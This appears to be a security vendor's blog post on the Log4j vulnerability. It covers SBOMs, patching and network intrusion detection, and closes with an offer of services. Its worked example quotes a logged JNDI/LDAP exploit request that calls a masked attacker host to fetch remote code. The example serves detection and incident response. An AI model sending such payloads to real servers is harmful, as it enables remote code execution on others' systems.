The importance of network visibility
Log4j
Are you affected?
Most organizations quickly want to find out if they are affected or not. This can be discovered fairly easily if you have a software bill-of-materials (SBOM) ready. If you do not, prepare for some manual investigation and think about creating such an SBOM in the near future. Either way, you’ll probably investigate whether you are impacted or not, and will either patch or implement a workaround where possible.
Network intrusion detection
A practical example
This might sound a bit abstract so here’s an example:
1. The attacker sent a malicious request to our perimeter firewall.
GET /$%7Bjndi:ldap://x.x.x.x:x/Exploit%7D HTTP/1.1
2. Our perimeter firewall logged this request and forwarded it to a central logging server.
# The code ultimately executed on our webserver open() "/usr/local/www/${jndi:ldap:/x.x.x.x:x/Exploit}"
Conclusion
- Threat actors (hackers) do not need a lot of time to exploit newly-found vulnerabilities. Even worse, they tend to abuse the confusion for their own personal gain!
- Increased visibility in and knowledge of your own network is crucial to detect if you have been attacked or not and assists in the incident response process when you do get an incident.
Do you need help to increase network visibility, or assistance in assessing vulnerabilities in your systems? Feel free to reach out to us, we’ll gladly help.